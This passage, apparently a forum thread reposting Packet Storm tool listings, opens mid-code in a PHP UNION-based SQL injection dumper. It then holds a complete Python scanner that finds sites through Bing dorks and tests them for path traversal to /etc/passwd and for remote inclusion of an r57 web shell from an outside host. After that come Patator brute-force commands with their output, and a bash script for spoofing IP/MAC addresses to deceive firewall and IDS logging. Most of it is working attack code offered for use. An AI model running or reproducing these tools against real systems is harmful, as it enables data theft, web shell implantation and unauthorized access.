$x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1,0x3a,$column2"); $filename = 
"dumps/".__parse($site).",$column1"."_"."$column2.txt"; } else { $dump_url[] = __make_SQL_URL($site,$colons,$effected,"+from+$selected",TRUE, $x,__hexEncode("<dumped>"),__hexEncode("</dumped>"),"$column1"); $filename = "dumps/".__parse($site).",$column1.txt"; } // $dump_page = fetch($dump_url); // if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$dump_page)) // { // exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); // } // elseif(preg_match("#403 Forbidden#si",$dump_page)) // { // exit("[-]Fail -> 403 Forbidden\n"); // } // $dump_page = __replace($dump_page); // if(preg_match("/<dumped>(.*?)<\/dumped>/si",$dump_page,$dumps)) // { // $dump = $dumps[1]; // echo strip_tags(trim("[$x]$dump"))."\n"; // ob_flush();flush(); // __dumpsave($filename,$dump."\r\n"); // } } if($datacount[1] >= 20) { $dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,TRUE, $filename); } else { $dumps = __threading($dump_url,10,"/<dumped>(.*?)<\/dumped>/si",TRUE,FALSE,""); } unset($column_url); unset($dump_url); goto col_showagain; } elseif($whatdo == "back") { unset($column_url); unset($cols); goto table_again; } elseif($whatdo == "exit") { exit("\n"); } else { echo "[-]Unknown command\n"; goto what_again; } function fetch($url) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_TIMEOUT,10); $oba = curl_exec($curl); return $oba; } function __make_SQL_URL($site,$colons,$effected,$from,$concat,$limit,$hex1,$hex2, $what) { $colon_union = range(1,$colons); if($concat) { $colon_union[$effected-1] = "concat(0x$hex1,$what,0x$hex2)"; } else { $colon_union[$effected-1] = "group_concat(0x$hex1,$what,0x$hex2)"; } $colon_union = implode(",",$colon_union); if($from) { if($limit != null) { $url = $site."+and+1=0+union+select+".$colon_union.$from."+limit+ $limit,1--"; }else { $url = $site."+and+1=0+union+select+".$colon_union.$from."--"; } }else{ if($limit != null) { $url = 
$site."+and+1=0+union+select+".$colon_union."+limit+$limit,1--"; } $url = $site."+and+1=0+union+select+".$colon_union."--"; } return $url; } function __threading($urls,$thread,$regex,$yaz,$kaydet,$file=NULL) { $init = curl_multi_init(); $urls = array_chunk($urls,$thread); $x = 0; foreach($urls as $url) { for($i=0;$i<=count($url)-1;$i++) { $curl[$i] = curl_init(); curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1); curl_setopt($curl[$i],CURLOPT_URL,$url[$i]); curl_setopt($curl[$i],CURLOPT_TIMEOUT,10); curl_multi_add_handle($init,$curl[$i]); } do{curl_multi_exec($init,$active);usleep(11);}while($active>0); foreach($curl as $cid => $page) { $content[$cid] = curl_multi_getcontent($page); curl_multi_remove_handle($init,$page); if(preg_match("#Illegal mix of collations for operation 'UNION'#si",$content[$cid])) { exit("[-]Fail -> Illegal mix of collations for operation 'UNION'\n"); } elseif(preg_match("#403 Forbidden#si",$content[$cid])) { exit("[-]Fail -> 403 Forbidden\n"); } preg_match($regex,$content[$cid],$veri); if($yaz == TRUE) { if(!empty($veri[1]) && preg_match("/[a-zA-Z0-9]:[a-zA-Z0-9]/si",$veri[1])) { $x++; echo "[$x]$veri[1]\n"; ob_flush();flush(); if($kaydet == TRUE && $file != NULL) { $fopen = fopen($file,'ab'); fwrite($fopen,trim($veri[1])."\r\n"); fclose($fopen); } } } else { $veriler[] = $veri[1]; } } } return $veriler; } function __hexEncode($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function __replace($text) { $text = str_replace("<","<",$text); $text = str_replace(">",">",$text); return $text; } function __dumpsave($file,$text) { $fp = fopen($file,'ab'); fwrite($fp,$text); fclose($fp); return true; } function __parse($site) { $site = explode("/",$site); $site = $site[2]; return $site; } ?> Download: http://packetstormsecurity.com/files/download/121491/sqlinjecter.txt Source: Multithreaded SQL Injector ? Packet Storm
  7. This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities. Authored by:miyachung Systems | unix ################################################## # Bing LFI-RFI Searcher # Coded by Miyachung # Janissaries.Org # Miyachung@hotmail.com ################################################## import threading import urllib2,urllib,socket import re import time import sys socket.setdefaulttimeout(5) def dorker(url,limit,shell): try: regex = re.compile("h3><a href=\"(.*?)\" h=") path = "../../../../../../../../../../../../../../etc/passwd" pathn = "../../../../../../../../../../../../../../etc/passwd%00" conn = urllib2.urlopen(url) data = conn.read() links= regex.findall(data) for link in links: link = link.strip() if re.search("=",link) and link.find("youtube") == -1 and link.find ("forum") == -1 and link.find("google") == -1 and link.find("viewtopic") == -1 and link.find("showthread") == -1 and link.find("blog") == -1 and link.find("yahoo") == -1: link = link.split('=') link = link[0]+"=" check= urllib2.urlopen(link+path,None,3).read() if re.search("root:x",check): a = "######################################################### \r\n" a+= "[+]"+link+" /etc/passwd readed without null byte\r\n" a+= "[+]read -> "+link+path+"\r\n" a+= "[+]coded by miyachung\r\n" print a + "#########################################################" kaydet(a) else: check = urllib2.urlopen(link+pathn,None,3).read() if re.search("root:x",check): a = "#########################################################\r\n" a += "[+]"+link+" /etc/passwd readed with null byte!\r\n" a += "[+]read -> "+link+pathn+"\r\n" a += "[+]coded by miyachung\r\n" print a + "#########################################################" kaydet(a) else: print link+" hasn't got lfi vulnerability" checkrfi = urllib2.urlopen(link+shell,None,3).read() if re.search("safe_mode",checkrfi): a = "#########################################################\r\n" a+= "[+]remote file 
include vulnerability works!\r\n" a+= "[+]shell -> "+link+shell+"\r\n" a+= "[+]coded by miyachung\r\n" print a + "#########################################################" kaydet(a) else: print link+" hasn't got rfi vulnerability" except urllib2.URLError: print link+" urlerror" pass except urllib2.HTTPError: print link+" httperror" pass except socket.timeout: print link+" timeout" pass except: pass limit.release() def kaydet(yazi): ac = open('results.txt','ab') ac.write(yazi) ac.close() class Exploiter: def main(self,dorks,thread,shell): for dork in open(dorks): dork = dork.strip() i = 1 limit = threading.BoundedSemaphore(value=thread) tasks = [] while i <= 451: limit.acquire() th = threading.Thread(target=dorker,args=("http://www.bing.com/ search?q="+urllib.quote_plus(dork)+"&count=50&first="+str (i)+"&FORM=PERE",limit,shell,)) tasks.append(th) th.start() i += 50 for t in tasks: t.join() try: exploit = Exploiter() exploit.main(sys.argv[1],int(sys.argv[2]),"http://www.xfocus.net/tools/200608/ r57.txt?") except IndexError: print "# Bing LFI-RFI Searcher" print "# Coded by Miyachung" print "# Janissaries.Org" print "Usage: python searcher.py DORKLISTFILE THREAD" print "Examp: python searcher.py dorks.txt 10" Download: http://packetstormsecurity.com/files/download/121590/binglfirfi.txt Source: Bing LFI / RFI Scanner ? Packet Storm
  8. Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. When Medusa, Hydra or other brute-force tools fail to do what you want, Patator might be what you need. Authored by:Sebastien Macke Changes : Various new modules. Multiple improvements, bug fixes, and additions. Currently it supports the following modules: * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * finger_lookup : Enumerate valid users using Finger * http_fuzz : Brute-force HTTP/HTTPS * pop_login : Brute-force POP * pop_passd : Brute-force poppassd (not POP3) * imap_login : Brute-force IMAP * ldap_login : Brute-force LDAP * smb_login : Brute-force SMB * smb_lookupsid : Brute-force SMB SID-lookup * vmauthd_login : Brute-force VMware Authentication Daemon * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * mysql_query : Brute-force MySQL queries * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Brute-force DNS * dns_reverse : Brute-force DNS (reverse lookup subnets) * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting. @lanjelot FTP : User enumeration on a too verbose server $ patator.py ftp_login host=10.0.0.1 user=FILE0 password=qsdf 0=logins.txt -x ignore:mesg='Login incorrect.' 
22:27:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 22:27 EST 22:27:29 patator INFO - 22:27:29 patator INFO - code size | candidate | num | mesg 22:27:29 patator INFO - ---------------------------------------------------------------------- 22:27:30 patator INFO - 530 18 | root | 1 | Permission denied. 22:27:31 patator INFO - 230 17 | ftp | 13 | Login successful. 22:27:34 patator INFO - 530 18 | admin | 23 | Permission denied. 22:27:34 patator INFO - 530 18 | oracle | 31 | Permission denied. 22:28:02 patator INFO - 530 18 | test | 179 | Permission denied. 22:28:21 patator INFO - 230 17 | anonymous | 283 | Login successful. 22:28:26 patator INFO - 530 18 | ftpuser | 357 | Permission denied. 22:28:41 patator INFO - 530 18 | nobody | 402 | Permission denied. ... HTTP : Brute-force phpMyAdmin logon $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1?=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf 10:55:50 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:55 EST 10:55:50 patator INFO - 10:55:50 patator INFO - code size:clen | candidate | num | mesg 10:55:50 patator INFO - ---------------------------------------------------------------------- 10:55:50 patator INFO - 200 8209:7075 | root: | 22 | HTTP/1.1 200 OK 10:55:51 patator INFO - 200 3838:2566 | root:p@ssw0rd | 44 | HTTP/1.1 200 OK ^C 10:55:52 patator INFO - Hits/Done/Skip/Fail/Size: 2/125/0/0/2342, Avg: 47 r/s, Time: 0h 0m 2s 10:55:52 patator INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12 Payload #22 was a false positive: $ cat /tmp/qsdf/22_200_8209\:7075.txt ... 
<div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div> SNMPv3 : Find valid usernames $ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName 17:51:06 patator INFO - Starting Patator v0.5 17:51:06 patator INFO - 17:51:06 patator INFO - code size | candidate | num | mesg 17:51:06 patator INFO - ---------------------------------------------------------------------- 17:51:11 patator INFO - 0-0 11 | robert | 55 | wrongDigest 17:51:12 patator INFO - Progress: 20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining) 17:51:33 patator INFO - 0-0 11 | myuser | 311 | wrongDigest 17:51:36 patator INFO - Hits/Done/Skip/Fail/Size: 2/345/0/0/345, Avg: 11 r/s, Time: 0h 0m 30s SNMPv3 : Find valid passwords $ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest 17:52:15 patator INFO - Starting Patator v0.5 17:52:15 patator INFO - 17:52:15 patator INFO - code size | candidate | num | mesg 17:52:15 patator INFO - ---------------------------------------------------------------------- 17:52:16 patator INFO - 0-0 69 | password123 | 16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686 17:52:17 patator INFO - Hits/Done/Skip/Fail/Size: 1/50/0/0/50, Avg: 38 r/s, Time: 0h 0m 1s DNS : Forward lookup $ dns_forward name=FILE0.hsc.fr 0=names.txt -x ignore:code=3 03:18:46 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:18 PMT 03:18:46 patator INFO - 03:18:46 patator INFO - code size | candidate | num | mesg 03:18:46 patator INFO - ---------------------------------------------------------------------- 03:18:46 patator INFO - 0 41 | www | 4 | NOERROR [www.hsc.fr. IN A 217.174.211.25] 03:18:46 patator INFO - 0 81 | mail | 32 | NOERROR [mail.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 44 | webmail | 62 | NOERROR [webmail.hsc.fr. 
IN A 192.70.106.95] 03:18:46 patator INFO - 0 93 | test | 54 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600] 03:18:46 patator INFO - 0 40 | wap | 66 | NOERROR [wap.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 85 | extranet | 131 | NOERROR [extranet.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 81 | news | 114 | NOERROR [news.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33] 03:18:46 patator INFO - 0 93 | mailhost | 137 | NOERROR [mailhost.hsc.fr. IN A 192.70.106.33][mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd] 03:18:46 patator INFO - 0 47 | lists | 338 | NOERROR [lists.hsc.fr. IN MX 10 itesec.hsc.fr.] 03:18:46 patator INFO - 0 93 | fr | 319 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600] 03:18:47 patator INFO - 0 40 | gl | 586 | NOERROR [gl.hsc.fr. IN A 192.70.106.103] Records ------------------------------------------ extranet.hsc.fr. IN CNAME itesec.hsc.fr. gl.hsc.fr. IN A 192.70.106.103 hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600 itesec.hsc.fr. IN A 192.70.106.33 lists.hsc.fr. IN MX 10 itesec.hsc.fr. mail.hsc.fr. IN CNAME itesec.hsc.fr. mailhost.hsc.fr. IN A 192.70.106.33 mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd news.hsc.fr. IN CNAME itesec.hsc.fr. wap.hsc.fr. IN A 192.70.106.33 webmail.hsc.fr. IN A 192.70.106.95 www.hsc.fr. 
IN A 217.174.211.25 Hostmap ------------------------------------------ mailhost.hsc.fr 2001:7a8:1155:2::abcd mailhost.hsc.fr 192.70.106.33 wap.hsc.fr 192.70.106.33 itesec.hsc.fr 192.70.106.33 extranet.hsc.fr mail.hsc.fr news.hsc.fr webmail.hsc.fr 192.70.106.95 gl.hsc.fr 192.70.106.103 www.hsc.fr 217.174.211.25 Domains ------------------------------------------ hsc.fr 10 Networks ----------------------------------------- 2001:7a8:1155:2::abcd 192.70.106.x 217.174.211.25 03:18:53 patator INFO - Hits/Done/Skip/Fail/Size: 11/1000/0/0/1000, Avg: 133 r/s, Time: 0h 0m 7s Also notice that test.hsc.fr. is the start of a new zone because we got NOERROR and no IP address. DNS : Reverse lookup two netblocks owned by Google $ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239- 03:24:22 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:24 PMT 03:24:22 patator INFO - 03:24:22 patator INFO - code size | candidate | num | mesg 03:24:22 patator INFO - ---------------------------------------------------------------------- 03:24:22 patator INFO - 0 46 | 216.239.32.10 | 11 | NOERROR [216.239.32.10 IN PTR ns1.google.com.] 03:24:22 patator INFO - 0 45 | 216.239.32.11 | 12 | NOERROR [216.239.32.11 IN PTR ns.google.com.] 03:24:22 patator INFO - 0 48 | 216.239.32.15 | 16 | NOERROR [216.239.32.15 IN PTR time1.google.com.] 03:24:23 patator INFO - 0 47 | 216.239.33.5 | 262 | NOERROR [216.239.33.5 IN PTR proxy.google.com.] 03:24:23 patator INFO - 0 47 | 216.239.33.12 | 269 | NOERROR [216.239.33.12 IN PTR dns1.google.com.] 03:24:23 patator INFO - 0 51 | 216.239.33.22 | 279 | NOERROR [216.239.33.22 IN PTR transfer.google.com.] 03:24:23 patator INFO - 0 50 | 216.239.33.20 | 277 | NOERROR [216.239.33.20 IN PTR esc-out.google.com.] 03:24:23 patator INFO - 0 46 | 216.239.34.10 | 523 | NOERROR [216.239.34.10 IN PTR ns2.google.com.] 
03:24:23 patator INFO - 0 48 | 216.239.34.15 | 528 | NOERROR [216.239.34.15 IN PTR time2.google.com.] ^C Records ------------------------------------------ 216.239.32.10 IN PTR ns1.google.com. 216.239.32.11 IN PTR ns.google.com. 216.239.32.15 IN PTR time1.google.com. 216.239.33.12 IN PTR dns1.google.com. 216.239.33.20 IN PTR esc-out.google.com. 216.239.33.22 IN PTR transfer.google.com. 216.239.33.5 IN PTR proxy.google.com. 216.239.34.10 IN PTR ns2.google.com. 216.239.34.15 IN PTR time2.google.com. Hostmap ------------------------------------------ ns1.google.com 216.239.32.10 ns.google.com 216.239.32.11 time1.google.com 216.239.32.15 proxy.google.com 216.239.33.5 dns1.google.com 216.239.33.12 esc-out.google.com 216.239.33.20 transfer.google.com 216.239.33.22 ns2.google.com 216.239.34.10 time2.google.com 216.239.34.15 Domains ------------------------------------------ google.com 9 Networks ----------------------------------------- 216.239.32.x 216.239.33.x 216.239.34.x 03:24:29 patator INFO - Hits/Done/Skip/Fail/Size: 9/872/0/0/4352, Avg: 115 r/s, Time: 0h 0m 7s 03:24:29 patator INFO - To resume execution, pass --resume 91,75,93,73,84,95,94,95,83,89 ZIP : Crack a password-protected ZIP file (older pkzip encryption used not to be supported in JtR) $ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0 10:54:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:54:29 PMT 10:54:29 patator INFO - 10:54:29 patator INFO - code size | candidate | num | mesg 10:54:29 patator INFO - ---------------------------------------------------------------------- 10:54:30 patator INFO - 0 82 | love | 387 | 0 [82] No errors detected in compressed data of challenge1.zip. 
^C 10:54:31 patator INFO - Hits/Done/Skip/Fail/Size: 1/1589/0/0/5000, Avg: 699 r/s, Time: 0h 0m 2s 10:54:31 patator INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154 SSH : Time-based user enumeration (using git version) $ python -c "print('A'*5000)" > /tmp/As.txt $ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=@/tmp/As.txt -x ignore:time=0-3.5 16:12:39 patator INFO - Starting Patator v0.6-beta (http://code.google.com/p/patator/) at 2013-07-13 16:12 EST 16:12:39 patator INFO - 16:12:39 patator INFO - code size time | candidate | num | mesg 16:12:39 patator INFO - ---------------------------------------------------------------------- 16:12:53 patator INFO - 1 22 13.643 | root | 1 | Authentication failed. 16:12:57 patator INFO - 1 22 15.404 | support | 18 | Authentication failed. 16:12:58 patator INFO - 1 22 13.315 | testuser | 25 | Authentication failed. 16:13:06 patator INFO - 1 22 7.377 | michael | 38 | Authentication failed. ... Download: http://packetstormsecurity.com/files/download/122392/patator_v0.5.py.txt Source: patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. - Google Project Hosting
  9. This is a simple bash script that makes spoofing a given host on a LAN easier in Linux. Authored by Vittorio Milazzo Systems | linux , unix #!/bin/bash # Version: 0.1 (24/07/2013) # Author: Vittorio Milazzo - vittorio.milazzo at gmail.com # # Notes: Bash script that permit to spoof Lan connections # and deceive firewall,proxy,IDS/NIDS traffic logging. # # Prerequisite packages: macchanger, netfilter # ============ # Intended use # ============ # The script purpose is to test how is possible to deceive firewall/proxy/NIDS logging in a local network. # ========== # Disclaimer # ========== # The author published this script and the information under the condition that them # will not be used for to bring to himself or others a profit or to bring to others damage. # The author is not responsible for any damage or losses of any kind caused by the use or # misuse of the script and from the information contained therein. # Author is not liable in any case of damage, including direct, indirect, incidental, # consequential loss of business profits or special damages. # ======= # Details # ======= # Three-way handshake completition: # This script assign ip alias ($spoof_ip) to network interface card, and change mac- address # using macchanger. After wich, iptables SNAT will send outgoing packets with ip alias address # and mac-address that we have changed. Hosts that will receive SYN spoofed packets, # will response with ACK flags to our ip alias (so packets will reach us), and SYN/ ACK packets will be send # from our ip alias to target hosts. # # BE CAREFULL: # When spoofed ip/mac address is an alive host in our Lan, it may happen that both (we and spoofed host) # will lose some packets and some established connections will drop. clear BANNER="trickfire v.0.1: Spoofing Lan connection - Firewall and IDS/NIDS deception logging" ######################### # 1.) 
NETWORK VARIABLES # ######################### # Set Lan default gateway ip address router="192.168.0.200" # Set network interface card used for spoofing interface="eth0" # Our real ip address real_ip=`ifconfig eth0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}';` # Our authentic mac address real_mac="c8:0a:a9:c0:49:a4" ########################## # 2.) SPOOFING VARIABLES # ########################## # # VARIANTS: # # A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING # # For deceive firewall/proxy or IDS/NIDS logging, you need to send spoofed packets to their. # # But if you are not sure about firewall or Nids ip address, or you don't know if in Lan there are some other NIDS # or sniffer with ip address on a different class, will be better to send spoofed packets to all (0/0). # This setting will permit to spoof connection vs all Lan hosts too. # # # B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING # # Otherwise, if in your network is not present a proxy server or IDS/NIDS, or you are not interested # to test spoofing Lan connections, you can deceive Firewall Internet traffic logging specifying your # Lan class ID with net prefix. (Ex: lan_id="192.168.0.0/24"). # With this option, iptables SNAT doesn't will send spoofed packets on entire Lan network ( ! -d $lan_id ), # and spoofed packets will arrive (and will log) only from default gateway (firewall or router). # # If you will use this setting, remember to comment/uncomment too appropriate iptables command below (in functions section). lan_id="0/0" # Ip address that you want to spoof spoof_ip="192.168.0.216" # Mac address that you want to spoof spoof_mac="ec:9a:74:64:f6:33" ################# # 3.) FUNCTIONS # ################# enable_spoof () { ifconfig $interface down macchanger -m $spoof_mac $interface >/dev/null ifconfig $interface:1 $spoof_ip ifconfig $interface up # A.) 
SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING # Use this if you have set variable lan_id="0/0" # iptables -t nat -I POSTROUTING -d $lan_id -j SNAT --to $spoof_ip # B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING # Use this if you have set variable lan_id="x.x.x.x/net_prefix" # (and comment iptables command above). # #iptables -t nat -I POSTROUTING ! -d $lan_id -j SNAT --to $spoof_ip # Block incoming connection (to avoid to be detected by possible listening services) iptables -I INPUT -i $interface -d $spoof_ip -p tcp --syn -m state --state NEW -j DROP iptables -I INPUT -i $interface -d $spoof_ip -p udp -m state --state NEW -j DROP route add default gw $router } disable_spoof () { ifconfig $interface down >/dev/null macchanger -m $real_mac $interface >/dev/null ifconfig $interface:1 down 2>/dev/null iptables -t nat -F ifconfig $interface up echo -e "\033[0;32mDefault gateway: $router\033[m" route add default gw $router } case "$1" in start) echo; echo -e "\033[31m$BANNER\033[m"; echo echo; echo -e "\033[31m- Spoofing started"; echo echo -e "\033[0;32mInterface: $interface\033[m" echo -e "\033[0;32mSpoofed ip: $spoof_ip\033[m" echo -e "\033[0;32mSpoofed mac address: $spoof_mac\033[m" echo enable_spoof echo exit 0 ;; stop) echo; echo -e "\033[31m$BANNER\033[m"; echo echo; echo -e "\033[31m- Spoofing stopped\033[m";echo echo -e "\033[31mBack to normal configuration:\033[m"; echo echo -e "\033[0;32mInterface: $interface\033[m" echo -e "\033[0;32mIp address: $real_ip\033[m" echo -e "\033[0;32mMac adress: $real_mac\033[m" disable_spoof echo exit 0 ;; *) echo echo -e " \033[31m#####################################################################\033[m" echo -e " \033[31m# trickfire v.0.1 #\033[m" echo -e " \033[31m# #\033[m" echo -e " \033[31m# Spoofing Lan connection - Firewall and IDS/NIDS deception logging #\033[m" echo -e " \033[31m# #\033[m" echo -e " \033[31m# Vittorio Milazzo - vittorio.milazzo at gmail.com #\033[m" echo -e " 
\033[31m#####################################################################\033[m" echo;echo -e "\033[36m1.) Change variables inside the script\033[m" echo;echo -e "\033[36m2.) Usage: ./trickfire.sh {start|stop}\033[m" echo exit 1 ;; esac exit 0 Download Link: http://packetstormsecurity.com/files/download/122544/trickfire.sh.txt Source: Trickfire Spoofing Script ? Packet Storm